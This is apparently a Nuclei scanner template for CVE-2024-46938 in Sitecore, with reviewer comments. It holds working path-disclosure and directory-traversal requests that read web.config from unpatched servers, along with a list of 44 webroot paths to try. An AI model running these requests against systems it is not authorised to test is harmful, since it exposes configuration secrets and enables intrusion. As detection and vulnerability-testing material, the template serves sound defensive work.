漏洞描述
An issue was discovered in Sitecore Experience Platform (XP), Experience Manager (XM), and Experience Commerce (XC) 8.0 Initial Release through 10.4 Initial Release. An unauthenticated attacker can read arbitrary files.
# Nuclei template for CVE-2024-46938: unauthenticated arbitrary file read in
# Sitecore XP/XM/XC, 8.0 Initial Release through 10.4 Initial Release.
# The indentation below was restored from a whitespace-mangled copy; every
# token is the original template's.
id: CVE-2024-46938

info:
  name: Sitecore Experience Platform <= 10.4 - Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    An issue was discovered in Sitecore Experience Platform (XP), Experience Manager (XM), and Experience Commerce (XC) 8.0 Initial Release through 10.4 Initial Release. An unauthenticated attacker can read arbitrary files.
  reference:
    - https://www.assetnote.io/resources/research/leveraging-an-order-of-operations-bug-to-achieve-rce-in-sitecore-8-x---10-x
    - https://nvd.nist.gov/vuln/detail/CVE-2024-46938
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-46938
    epss-score: 0.92442
    epss-percentile: 0.99724
    # Only the Commerce CPE is listed although the description also names
    # XP and XM.
    cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    # NOTE(review): stage 3 carries 44 payloads plus one request each for
    # stages 1 and 2, which looks like 46 rather than 45 — confirm against
    # nuclei's own request counting before relying on this figure.
    max-request: 45
    vendor: sitecore
    product: experience_commerce
    shodan-query: http.title:"sitecore"
    fofa-query: title="sitecore"
    google-query: intitle:"sitecore"
  tags: cve,cve2024,sitecore,lfi,rce,vkev

# All three stages must succeed in order. Stages 1 and 2 carry
# `internal: true` matchers, so they only gate stage 3 and never produce a
# finding on their own.
flow: http(1) && http(2) && http(3)

http:
  # Stage 1: fingerprint. A request for a non-existent media item is
  # expected to redirect to Sitecore's own not-found page, so the Location
  # header is checked rather than the body (host-redirects must be on for
  # that header to be visible).
  - method: GET
    path:
      - "{{BaseURL}}/-/media/doo-doo.ashx"
    host-redirects: true
    matchers:
      - type: word
        part: location
        words:
          - "/sitecore/service/notfound.aspx"
        internal: true

  # Stage 2: learn the site's physical path. The matcher looks for the
  # "Could not find a part of the path" error text, and the extractor
  # captures the directory prefix before "\x\x.txt" as {{file_path}} for
  # stage 3. The blank line before __PAGESTATE separates headers from the
  # request body and must stay.
  - raw:
      - |
        POST /-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.ValidateXHtml?hdl=a HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        __PAGESTATE=/../../x/x

    matchers:
      - type: word
        part: body
        words:
          - "Could not find a part of the path"
        internal: true

    extractors:
      - type: regex
        name: file_path
        group: 1
        regex:
          - Could not find a part of the path '([^']+)\\x\\x\.txt
        internal: true

  # Stage 3: confirm the read. The extracted path is tried first, followed
  # by a list of common Sitecore webroot names; stop-at-first-match ends the
  # sweep as soon as one hits. A hit requires all three DSL conditions:
  # web.config content in the body, a JavaScript content type, and HTTP 200.
  # For defenders: requests to /-/speak/v1/bundles/bundle.js whose "f"
  # parameter contains "..\" or ends in "web.config%23.js" are the signature
  # of this probe in web-server logs.
  - raw:
      - |
        GET /-/speak/v1/bundles/bundle.js?f={{paths}}sitecore\shell\client\..\..\..\web.config%23.js HTTP/1.1
        Host: {{Hostname}}

    payloads:
      paths:
        # Single-quoted so the trailing backslash stays literal.
        - '{{file_path}}\'
        - 'C:\inetpub\wwwroot\sitecore\'
        - 'C:\inetpub\wwwroot\sitecore1\'
        - 'C:\inetpub\wwwroot\sxa\'
        - 'C:\inetpub\wwwroot\XP0.sc\'
        - 'C:\inetpub\wwwroot\Sitecore82\'
        - 'C:\inetpub\wwwroot\Sitecore81\'
        - 'C:\inetpub\wwwroot\Sitecore81u2\'
        - 'C:\inetpub\wwwroot\Sitecore7\'
        - 'C:\inetpub\wwwroot\Sitecore8\'
        - 'C:\inetpub\wwwroot\Sitecore70\'
        - 'C:\inetpub\wwwroot\Sitecore71\'
        - 'C:\inetpub\wwwroot\Sitecore72\'
        - 'C:\inetpub\wwwroot\Sitecore75\'
        - 'C:\Websites\spe.dev.local\'
        - 'C:\inetpub\wwwroot\SitecoreInstance\'
        - 'C:\inetpub\wwwroot\SitecoreSPE_8\'
        - 'C:\inetpub\wwwroot\SitecoreSPE_91\'
        - 'C:\inetpub\wwwroot\Sitecore9\'
        - 'C:\inetpub\wwwroot\sitecore93sc.dev.local\'
        - 'C:\inetpub\wwwroot\Sitecore81u3\'
        - 'C:\inetpub\wwwroot\sitecore9.sc\'
        - 'C:\inetpub\wwwroot\sitecore901xp0.sc\'
        - 'C:\inetpub\wwwroot\sitecore9-website\'
        - 'C:\inetpub\wwwroot\sitecore93.sc\'
        - 'C:\inetpub\wwwroot\'
        # Host-derived guesses: {{Hostname}}, {{FQDN}} and {{RDN}} are filled
        # in from the target at run time.
        - 'C:\inetpub\{{Hostname}}.sc\'
        - 'C:\inetpub\{{FQDN}}.sc\'
        - 'C:\inetpub\{{RDN}}.sc\'
        - 'C:\inetpub\{{FQDN}}\'
        - 'C:\inetpub\{{RDN}}\'
        - 'C:\inetpub\{{Hostname}}\'
        - 'C:\inetpub\{{Hostname}}.sitecore\'
        - 'C:\inetpub\{{FQDN}}.sitecore\'
        - 'C:\inetpub\{{RDN}}.sitecore\'
        - 'C:\inetpub\{{Hostname}}.website\'
        - 'C:\inetpub\{{FQDN}}.website\'
        - 'C:\inetpub\{{RDN}}.website\'
        - 'C:\inetpub\{{Hostname}}.dev.local\'
        - 'C:\inetpub\{{FQDN}}.dev.local\'
        - 'C:\inetpub\{{RDN}}.dev.local\'
        - 'C:\inetpub\{{Hostname}}sc.dev.local\'
        - 'C:\inetpub\{{FQDN}}sc.dev.local\'
        - 'C:\inetpub\{{RDN}}sc.dev.local\'
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<configuration>")'
          - 'contains(content_type, "text/javascript")'
          - 'status_code == 200'
        condition: and
# NOTE(review): the digest below is presumably a signature over the template
# text as originally published; any edit, including this reformatting, will
# need the template re-signed before it is trusted by a signature-checking
# runner — confirm with the project's signing tooling.
# digest: 4a0a004730450221009795a5b5f8bbf9fd8ee4785368e61eecfd13d3c8c7d0a0edcff9082739f41958022063c44b3172dd4035fb10653c608c962cb79549f7e479a8f7094bbf044ea4009a:922c64590222798bb761d5b6d8e72950